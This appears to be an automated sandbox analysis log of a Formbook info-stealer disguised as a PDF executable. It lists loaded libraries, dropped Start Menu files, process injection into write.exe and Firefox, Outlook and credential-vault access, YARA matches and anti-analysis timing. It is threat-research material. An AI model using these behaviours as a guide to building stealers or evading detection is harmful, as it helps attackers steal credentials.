        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051EFCE05_2_051EFCE0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528FF635_2_0528FF63
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0524FF405_2_0524FF40
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05273FA05_2_05273FA0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05281FC65_2_05281FC6
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D1EB25_2_051D1EB2
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05289ED25_2_05289ED2
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052159C05_2_052159C0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D38005_2_051D3800
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052458705_2_05245870
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528F8725_2_0528F872
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051D98705_2_051D9870
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051EB8705_2_051EB870
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052498B25_2_052498B2
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052878F35_2_052878F3
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_052818DA5_2_052818DA
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528FB2E5_2_0528FB2E
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0520DB195_2_0520DB19
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_05261B805_2_05261B80
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_0528FA895_2_0528FA89
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051EFAA05_2_051EFAA0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FD13005_2_02FD1300
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FCA7805_2_02FCA780
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FCA7765_2_02FCA776
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FCC7005_2_02FCC700
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FCC4E05_2_02FCC4E0
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FCC4D95_2_02FCC4D9
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FD2E605_2_02FD2E60
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FD2E5B5_2_02FD2E5B
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FC11215_2_02FC1121
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FE9DA05_2_02FE9DA0
        Source: C:\Windows\SysWOW64\write.exeCode function: String function: 05205050 appears 58 times
        Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0524EF10 appears 105 times
        Source: C:\Windows\SysWOW64\write.exeCode function: String function: 0523E692 appears 86 times
        Source: C:\Windows\SysWOW64\write.exeCode function: String function: 05217BE4 appears 111 times
        Source: C:\Windows\SysWOW64\write.exeCode function: String function: 051BB910 appears 280 times
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: String function: 36B25050 appears 50 times
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: String function: 36B5E692 appears 80 times
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: String function: 36ADB910 appears 240 times
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: String function: 36B37BE4 appears 100 times
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: String function: 36B6EF10 appears 78 times
        Source: BM-FM_NR.24040718PDF.exe, 00000000.00000000.12883268776.0000000000481000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebagprojektionens golfer.exe6 vs BM-FM_NR.24040718PDF.exe
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13533970795.0000000036880000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BM-FM_NR.24040718PDF.exe
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewritej% vs BM-FM_NR.24040718PDF.exe
        Source: BM-FM_NR.24040718PDF.exe, 00000002.00000003.13537482631.0000000036A34000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs BM-FM_NR.24040718PDF.exe
        Source: BM-FM_NR.24040718PDF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: 00000005.00000002.17951504935.0000000002FC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000006.00000002.17952328354.0000000000690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.13649482189.0000000036790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.17955935422.0000000004FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000005.00000002.17956116305.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000004.00000002.17954988019.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 00000002.00000002.13650313872.0000000036E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@7/7@29/13
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_0040310F EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040310F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_00404352 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404352
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_0040205E CoCreateInstance,MultiByteToWideChar,0_2_0040205E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenesJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nseCCE4.tmpJump to behavior
        Source: BM-FM_NR.24040718PDF.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: BM-FM_NR.24040718PDF.exeVirustotal: Detection: 12%
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile read: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeProcess created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
        Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeProcess created: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe "C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exe"Jump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: dwmapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: oleacc.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\write.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: BM-FM_NR.24040718PDF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: write.pdbGCTL source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: write.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13639421205.0000000006905000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: wntdll.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: BM-FM_NR.24040718PDF.exe, BM-FM_NR.24040718PDF.exe, 00000002.00000002.13649553951.0000000036AB0000.00000040.00001000.00020000.00000000.sdmp, write.exe
        Source: Binary string: mshtml.pdbUGP source: BM-FM_NR.24040718PDF.exe, 00000002.00000001.13262071242.0000000000649000.00000020.00000001.01000000.00000006.sdmp

        Data Obfuscation

        barindex
        Source: Yara matchFile source: 00000000.00000002.13454509223.0000000007965000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_10001A5D GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,0_2_10001A5D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 0_2_10002D20 push eax; ret 0_2_10002D4E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AB97A1 push es; iretd 2_2_36AB97A8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AB21AD pushad ; retf 0004h2_2_36AB223F
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_051C08CD push ecx; mov dword ptr [esp], ecx5_2_051C08D6
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FD4550 push edx; retf 5_2_02FD4551
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FC4535 push cs; ret 5_2_02FC453D
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FC6E86 pushfd ; iretd 5_2_02FC6E8B
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FC6E29 pushfd ; iretd 5_2_02FC6E8B
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FC8C36 pushfd ; iretd 5_2_02FC8C39
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FD2C18 push edi; iretd 5_2_02FD2C3A
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FDF54E push esp; iretd 5_2_02FDF550
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FDFB69 push edi; retf 5_2_02FDFB89
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FCDEE9 push ebx; retf 5_2_02FCDEEE
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FC7EA4 push es; iretd 5_2_02FC7EAC
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FCDE9B pushad ; ret 5_2_02FCDE9C
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FCDE11 push es; retf 5_2_02FCDE12
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FC3F52 push EEC03D28h; ret 5_2_02FC3F5C
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FDFCD4 push edx; iretd 5_2_02FDFD03
        Source: C:\Windows\SysWOW64\write.exeCode function: 5_2_02FDFD04 push edx; iretd 5_2_02FDFD03
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenesJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Trophaeum.UnoJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Filantroper.oveJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\SkoleopholdJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\Paleoatavistic.Rok179Jump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\Hjrners133.txtJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\skebladenes\Skoleophold\princelings.barJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\write.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B21763 rdtsc 2_2_36B21763
        Source: C:\Windows\SysWOW64\write.exeWindow / User API: threadDelayed 9050Jump to behavior
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspCEF8.tmp\System.dllJump to dropped file
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeAPI coverage: 0.2 %
        Source: C:\Windows\SysWOW64\write.exeAPI coverage: 2.6 %
        Source: C:\Windows\SysWOW64\write.exe TID: 1580Thread sleep count: 119 > 30Jump to behavior
        Source: C:\Windows\SysWOW64\write.exe TID: 1580Thread sleep time: -238000s >= -30000sJump to behavior
